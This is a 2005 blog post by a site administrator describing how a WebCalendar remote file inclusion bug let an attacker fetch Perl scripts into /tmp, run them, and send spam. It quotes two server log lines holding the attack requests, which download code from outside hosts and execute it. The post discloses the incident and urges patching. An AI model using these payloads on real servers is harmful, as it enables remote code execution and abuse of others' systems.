Wanna see this logo while booting your 2.6 kernel? Click here!

27.10.2005 10:51

tuxx-home.at got hacked again


This time the problem was caused by a security bug in the webcalendar application of one virtual host on this site (fazerforum.motorradseiten.at).

Someone sent some commands like this to my server that allowed him to download some perl scripts etc. to /tmp and execute them (No, /tmp is not executable, he or she called the perl interpreter directly to run this scripts).
vhosts/fazerforum.motorradseiten.at/access.log.0:201.32.151.217 - - [26/Oct/2005:13:20:54 +0200] \
    "GET /webcalendar//tools/send_reminders.php?includedir=\
    http://freewebbe.supereva.it/asc.txt?&cmd=cd%20/tmp;wget%20\
    http://alexaraojo.sites.uol.com.br/dc.txt
vhosts/fazerforum.motorradseiten.at/access.log.0:201.45.100.130 - - [27/Oct/2005:06:29:06 +0200] \
    "GET /webcalendar//tools/send_reminders.php?includedir=\
    http://freewebbe.supereva.it/asc.txt?&cmd=cd%20/tmp;lwp-download%20\
    http://www.tutoworld.org/xpl/dc.txt;perl%20dc.txt%20216.22.25.95%2017832
These scripts tried to send several thousands of emails through my server and therefore I had to deactivate the fazerforum until it is fixed.

More news later on, when I finally get rid of this issue.

Update:
After searching through the web, I found the security issue on the webcalendar project page and a discussion about this issue here.

It seems, that this issue is quite easy to fix, so I'll fix it now.
If you're using webcalendar, I strongly encourage you to apply the fix or update to 1.0.1!